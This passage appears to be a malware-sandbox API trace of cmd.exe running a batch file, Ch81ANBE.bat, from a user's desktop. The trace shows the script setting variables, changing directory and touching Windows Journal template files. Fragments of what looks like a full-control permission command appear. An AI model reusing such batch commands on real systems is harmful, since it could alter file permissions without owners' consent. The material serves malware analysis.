FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0233.651] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.651] GetFileType (hFile=0x78) returned 0x1 [0233.651] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.651] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0233.651] GetProcessHeap () returned 0x460000 [0233.651] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x484bc8 [0233.651] GetProcessHeap () returned 0x460000 [0233.651] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x80) returned 0x4611d0 [0233.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp", nBufferLength=0x208, lpBuffer=0x3de878, lpFilePart=0x3de870 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp", lpFilePart=0x3de870*="Dotted_Line.jtp") returned 0x3a [0233.652] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x3de58c | out: lpFindFileData=0x3de58c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x461258 [0233.652] FindClose (in: hFindFile=0x461258 | out: hFindFile=0x461258) returned 1 [0233.652] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0233.652] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x3de58c | out: lpFindFileData=0x3de58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 0x461258 [0233.652] FindClose (in: hFindFile=0x461258 | out: hFindFile=0x461258) returned 1 [0233.652] _wcsnicmp (_String1="WI0FCF~1", _String2="Windows Journal", _MaxCount=0xf) returned -62 [0233.652] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates", lpFindFileData=0x3de58c | out: lpFindFileData=0x3de58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0x461258 [0233.652] FindClose (in: hFindFile=0x461258 | out: hFindFile=0x461258) returned 1 [0233.652] _wcsnicmp (_String1="TEMPLA~1", _String2="Templates", _MaxCount=0x9) returned 10 [0233.652] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp", lpFindFileData=0x3de58c | out: lpFindFileData=0x3de58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5597007, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5597007, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x46ca8869, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ce6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dotted_Line.jtp", cAlternateFileName="")) returned 0x461258 [0233.652] FindClose (in: hFindFile=0x461258 | out: hFindFile=0x461258) returned 1 [0233.652] GetProcessHeap () returned 0x460000 [0233.652] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x28) returned 0x461258 [0233.653] GetProcessHeap () returned 0x460000 [0233.653] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x484bc8 | out: hHeap=0x460000) returned 1 [0233.654] _tell (_FileHandle=3) returned 63 [0233.655] _close (_FileHandle=3) returned 0 [0233.655] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3deebc | out: _Buffer="\r\n") returned 2 [0233.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.655] GetFileType (hFile=0x7) returned 0x2 [0233.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dee7c | out: lpMode=0x3dee7c) returned 1 [0233.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.656] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3deea8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3deea8*=0x2) returned 1 [0234.048] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0234.048] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0234.048] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3deeb8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0234.048] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3deeb8 | out: _Buffer=">") returned 1 [0234.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.048] GetFileType (hFile=0x7) returned 0x2 [0234.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.049] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dee80 | out: lpMode=0x3dee80) returned 1 [0234.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.049] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3deeac, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3deeac*=0x26) returned 1 [0234.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.049] GetFileType (hFile=0x7) returned 0x2 [0234.050] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.050] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df104 | out: lpMode=0x3df104) returned 1 [0234.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.050] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x460dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3df130, lpReserved=0x0 | out: lpBuffer=0x460dc0*, lpNumberOfCharsWritten=0x3df130*=0x3) returned 1 [0234.050] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df13c | out: _Buffer=" FN=\"Dotted_Line.jtp\" ") returned 22 [0234.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.050] GetFileType (hFile=0x7) returned 0x2 [0234.051] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.051] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0fc | out: lpMode=0x3df0fc) returned 1 [0234.051] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.051] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x3df128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df128*=0x16) returned 1 [0234.051] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df15c | out: _Buffer="\r\n") returned 2 [0234.051] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.051] GetFileType (hFile=0x7) returned 0x2 [0234.052] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.052] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df11c | out: lpMode=0x3df11c) returned 1 [0234.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.052] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df148*=0x2) returned 1 [0234.054] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0234.054] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0234.054] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0234.054] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0234.054] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0234.054] _wcsicmp (_String1="set", _String2="CD") returned 16 [0234.054] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0234.054] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0234.054] _wcsicmp (_String1="set", _String2="REN") returned 1 [0234.054] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0234.054] _wcsicmp (_String1="set", _String2="SET") returned 0 [0234.054] GetConsoleTitleW (in: lpConsoleTitle=0x3deccc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.055] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0234.055] SetEnvironmentVariableW (lpName="FN", lpValue="\"Dotted_Line.jtp\"") returned 1 [0234.055] GetProcessHeap () returned 0x460000 [0234.055] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4781a8 | out: hHeap=0x460000) returned 1 [0234.055] GetEnvironmentStringsW () returned 0x476b50* [0234.055] GetProcessHeap () returned 0x460000 [0234.055] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb86) returned 0x4776e0 [0234.055] FreeEnvironmentStringsW (penv=0x476b50) returned 1 [0234.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.055] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.056] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0234.056] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.056] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0234.056] SetConsoleInputExeNameW () returned 0x1 [0234.056] GetConsoleOutputCP () returned 0x1b5 [0234.056] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0234.057] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0234.058] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0234.058] _get_osfhandle (_FileHandle=3) returned 0x78 [0234.058] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0234.058] GetProcessHeap () returned 0x460000 [0234.058] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474240 | out: hHeap=0x460000) returned 1 [0234.058] GetProcessHeap () returned 0x460000 [0234.058] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474200 | out: hHeap=0x460000) returned 1 [0234.058] GetProcessHeap () returned 0x460000 [0234.058] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461288 | out: hHeap=0x460000) returned 1 [0234.058] GetProcessHeap () returned 0x460000 [0234.058] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x460db8 | out: hHeap=0x460000) returned 1 [0234.058] GetProcessHeap () returned 0x460000 [0234.058] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4741a0 | out: hHeap=0x460000) returned 1 [0234.058] GetProcessHeap () returned 0x460000 [0234.058] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461258 | out: hHeap=0x460000) returned 1 [0234.058] GetProcessHeap () returned 0x460000 [0234.058] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4611d0 | out: hHeap=0x460000) returned 1 [0234.058] _get_osfhandle (_FileHandle=3) returned 0x78 [0234.058] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0234.058] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df0e8*=0xa3, lpOverlapped=0x0) returned 1 [0234.058] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0234.058] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0234.059] _get_osfhandle (_FileHandle=3) returned 0x78 [0234.059] GetFileType (hFile=0x78) returned 0x1 [0234.059] _get_osfhandle (_FileHandle=3) returned 0x78 [0234.059] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0234.059] GetProcessHeap () returned 0x460000 [0234.059] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x484bc8 [0234.059] GetProcessHeap () returned 0x460000 [0234.059] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x70) returned 0x4611d0 [0234.059] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x3de878, lpFilePart=0x3de870 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x3de870*="Ch81ANBE.bat") returned 0x32 [0234.059] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3de58c | out: lpFindFileData=0x3de58c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x461248 [0234.059] FindClose (in: hFindFile=0x461248 | out: hFindFile=0x461248) returned 1 [0234.060] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3de58c | out: lpFindFileData=0x3de58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x461248 [0234.060] FindClose (in: hFindFile=0x461248 | out: hFindFile=0x461248) returned 1 [0234.060] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0234.060] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3de58c | out: lpFindFileData=0x3de58c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x461248 [0234.060] FindClose (in: hFindFile=0x461248 | out: hFindFile=0x461248) returned 1 [0234.060] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x3de58c | out: lpFindFileData=0x3de58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x461248 [0234.061] FindClose (in: hFindFile=0x461248 | out: hFindFile=0x461248) returned 1 [0234.061] GetProcessHeap () returned 0x460000 [0234.061] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x56) returned 0x461248 [0234.061] GetProcessHeap () returned 0x460000 [0234.061] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x484bc8 | out: hHeap=0x460000) returned 1 [0234.063] _tell (_FileHandle=3) returned 78 [0234.063] _close (_FileHandle=3) returned 0 [0234.063] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3deebc | out: _Buffer="\r\n") returned 2 [0234.063] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.063] GetFileType (hFile=0x7) returned 0x2 [0234.063] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.063] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dee7c | out: lpMode=0x3dee7c) returned 1 [0234.063] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.063] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3deea8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3deea8*=0x2) returned 1 [0234.065] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0234.065] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0234.065] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3deeb8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0234.065] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3deeb8 | out: _Buffer=">") returned 1 [0234.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.065] GetFileType (hFile=0x7) returned 0x2 [0234.066] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.066] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dee80 | out: lpMode=0x3dee80) returned 1 [0234.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.066] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3deeac, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3deeac*=0x26) returned 1 [0234.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.066] GetFileType (hFile=0x7) returned 0x2 [0234.067] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.067] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df104 | out: lpMode=0x3df104) returned 1 [0234.067] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.067] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x460dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df130, lpReserved=0x0 | out: lpBuffer=0x460dc0*, lpNumberOfCharsWritten=0x3df130*=0x2) returned 1 [0234.067] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df13c | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0234.067] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.067] GetFileType (hFile=0x7) returned 0x2 [0234.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0fc | out: lpMode=0x3df0fc) returned 1 [0234.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.068] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x3df128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df128*=0x2d) returned 1 [0234.070] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df15c | out: _Buffer="\r\n") returned 2 [0234.070] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.070] GetFileType (hFile=0x7) returned 0x2 [0234.070] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.070] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df11c | out: lpMode=0x3df11c) returned 1 [0234.070] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.070] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df148*=0x2) returned 1 [0234.072] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0234.072] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0234.072] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0234.072] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0234.072] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0234.072] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0234.072] GetConsoleTitleW (in: lpConsoleTitle=0x3deccc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.073] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3dea88, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x3dea80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3dea80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.074] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3de824 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0234.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x3de824, lpFilePart=0x3de820 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x3de820*=0x0) returned 0x26 [0234.074] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0234.074] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3de5a0 | out: lpFindFileData=0x3de5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x474480 [0234.074] FindClose (in: hFindFile=0x474480 | out: hFindFile=0x474480) returned 1 [0234.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3de5a0 | out: lpFindFileData=0x3de5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x474480 [0234.074] FindClose (in: hFindFile=0x474480 | out: hFindFile=0x474480) returned 1 [0234.074] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0234.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3de5a0 | out: lpFindFileData=0x3de5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x474480 [0234.075] FindClose (in: hFindFile=0x474480 | out: hFindFile=0x474480) returned 1 [0234.075] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0234.075] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0234.075] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0234.075] GetProcessHeap () returned 0x460000 [0234.075] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4776e0 | out: hHeap=0x460000) returned 1 [0234.075] GetEnvironmentStringsW () returned 0x476b50* [0234.075] GetProcessHeap () returned 0x460000 [0234.075] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb86) returned 0x4776e0 [0234.075] FreeEnvironmentStringsW (penv=0x476b50) returned 1 [0234.075] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0234.075] GetProcessHeap () returned 0x460000 [0234.075] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474420 | out: hHeap=0x460000) returned 1 [0234.075] GetProcessHeap () returned 0x460000 [0234.075] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4743c0 | out: hHeap=0x460000) 